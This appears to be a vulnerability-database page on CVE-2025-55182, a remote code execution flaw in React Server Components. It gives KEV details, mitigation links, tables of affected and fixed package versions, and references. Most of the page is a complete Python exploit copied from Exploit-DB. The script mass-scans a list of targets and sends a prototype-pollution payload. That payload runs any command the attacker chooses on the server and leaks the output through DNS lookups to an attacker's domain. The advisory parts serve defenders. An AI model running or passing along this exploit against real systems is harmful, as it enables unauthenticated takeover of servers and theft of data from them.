CVE-2025-55182
unknown
KEV
CVSS v3
—
CVSS v4 NEW
—
VIR risk
2.5
Description
Meta React Server Components contains a flaw in how React decodes payloads sent to React Server Function endpoints that could allow unauthenticated remote code execution. Please note CVE-2025-66478 has been rejected, but it is associated with CVE-2025-55182.
CISA KEV
- Vendor
- Meta
- Product
- React Server Components
- Due date
- 2025-12-12
Predictions
Exploit likelihood
99%
Patch ETA
—
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
Vendor advisory (CISA KEV): Check for signs of potential compromise on all internet-accessible React instances after applying mitigations. For more information, please see: https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components ; https://github.com/vercel-labs/fix-react2shell-next?tab=readme-ov-file ; https://nvd.nist.gov/vuln/detail/CVE-2025-55182
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
React Server 19.2.0 - Remote Code Execution
```python
# Exploit Title: React Server 19.2.0 - Remote Code Execution
# Date: 2025-12-05
# Exploit Author: [EynaExp] (https://github.com/EynaExp)
# Vendor Homepage: https://react.dev
# Software Link: https://react.dev/reference/rsc/server-components
# Version: [19.0.0, 19.1.0, 19.1.1, 19.2.0]
# Tested on: Windows, Linux
# CVE : CVE-2025-55182
import argparse
from concurrent.futures import ThreadPoolExecutor, as_completed

import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


# Color definitions
class Colors:
    RED = '\033[91m'
    GREEN = '\033[92m'
    YELLOW = '\033[93m'
    BLUE = '\033[94m'
    END = '\033[0m'


# Banner (ASCII-art logo omitted)
print("""
CVE-2025-55182 Proof of Concept
by EynaExp
GitHub: https://github.com/EynaExp
""")
print(f"{Colors.RED}Disclaimer:\nThis tool is released for EDUCATIONAL and AUTHORIZED TESTING purposes only.\nThe author is not responsible for any misuse or damage caused by this program.{Colors.END}")


class NoUsageParser(argparse.ArgumentParser):
    def error(self, message):
        # completely suppress argparse usage
        print(f"Error: {message}")
        raise SystemExit(1)


parser = NoUsageParser(description="EynaExp Scanner")
parser.add_argument('-d', required=True)  # DNS endpoint (no scheme)
parser.add_argument('-l', required=True)  # targets file (one URL per line)
parser.add_argument('-c', required=True)  # command
print(f"{Colors.GREEN}\n[+]APP USAGE :\n[-d] <DNS(without http/s)>\n[-l] <Targets file path(url wordlist)>\n[-c] <Command>{Colors.END}\n")
args = parser.parse_args()

dns_endpoint = args.d.strip()
targets_file_path = args.l.strip()
CMD = args.c.strip()

# Headers sent with every request
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36",
    "Next-Action": "x",
    "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad"
}

# Multipart body sent to the Server Function endpoint
request_body = (
    "------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
    "Content-Disposition: form-data; name=\"0\"\r\n\r\n"
    "{\"then\":\"$1:__proto__:then\",\"status\":\"resolved_model\",\"reason\":-1,"
    "\"value\":\"{\\\"then\\\":\\\"$B1337\\\"}\","
    "\"_response\":{\"_prefix\":\"process.mainModule.require('child_process').execSync('nslookup `"+CMD+"`."+dns_endpoint+"');\","
    "\"_formData\":{\"get\":\"$1:constructor:constructor\"}}}\r\n"
    "------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
    "Content-Disposition: form-data; name=\"1\"\r\n\r\n"
    "\"$@0\"\r\n"
    "------WebKitFormBoundaryx8jO2oVc6SWP3Sad--\r\n"
)


def send_request(target_url):
    # POST the body to one target and summarise the response
    try:
        response = requests.post(target_url, headers=headers, data=request_body, timeout=10, verify=False)
        result_message = f"{Colors.GREEN}[+] {target_url} -> {response.status_code} ({len(response.content)} bytes){Colors.END}"
        for header_key in ["x-action", "next-action", "rsc"]:
            if header_key in response.headers:
                result_message += f"\n{Colors.BLUE} header match: {header_key} = {response.headers.get(header_key)}{Colors.END}"
        return result_message
    except Exception as exception:
        return f"{Colors.RED}[-] {target_url} -> error: {exception}{Colors.END}"


with open(targets_file_path) as file_handle:
    target_urls = [line.strip() for line in file_handle if line.strip()]

print(f"{Colors.YELLOW}[*] Loaded {len(target_urls)} targets, starting multi-thread scan...{Colors.END}\n")

with ThreadPoolExecutor(max_workers=30) as executor:
    futures = {executor.submit(send_request, url): url for url in target_urls}
    for future in as_completed(futures):
        print(future.result())
```
Metasploit modules
Source fetch failed (fetch_error).
Package impact
| Ecosystem | Package | Vulnerable | Fixed |
|---|---|---|---|
| npm | react-server-dom-webpack | >=19.0.0,<19.0.1 | 19.0.1 |
| npm | react-server-dom-webpack | >=19.1.0,<19.1.2 | 19.1.2 |
| npm | react-server-dom-webpack | >=19.2.0,<19.2.1 | 19.2.1 |
| npm | react-server-dom-turbopack | >=19.0.0,<19.0.1 | 19.0.1 |
| npm | react-server-dom-turbopack | >=19.1.0,<19.1.2 | 19.1.2 |
| npm | react-server-dom-turbopack | >=19.2.0,<19.2.1 | 19.2.1 |
| npm | react-server-dom-parcel | >=19.0.0,<19.0.1 | 19.0.1 |
| npm | react-server-dom-parcel | >=19.1.0,<19.1.2 | 19.1.2 |
| npm | react-server-dom-parcel | >=19.2.0,<19.2.1 | 19.2.1 |
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| aws | aws | | |
References
- https://github.com/facebook/react/security/advisories/GHSA-fv66-9v8q-g76r
- https://nvd.nist.gov/vuln/detail/CVE-2025-55182
- https://github.com/facebook/react/pull/35277
- https://github.com/facebook/react/commit/7dc903cd29dac55efb4424853fd0442fef3a8700
- https://github.com/ejpir/CVE-2025-55182-poc
- https://github.com/facebook/react
- https://github.com/facebook/react/releases/tag/v19.0.1
- https://github.com/facebook/react/releases/tag/v19.1.2
- https://github.com/facebook/react/releases/tag/v19.2.1
- https://news.ycombinator.com/item?id=46136026
- https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
- https://www.facebook.com/security/advisories/cve-2025-55182
- http://www.openwall.com/lists/oss-security/2025/12/03/4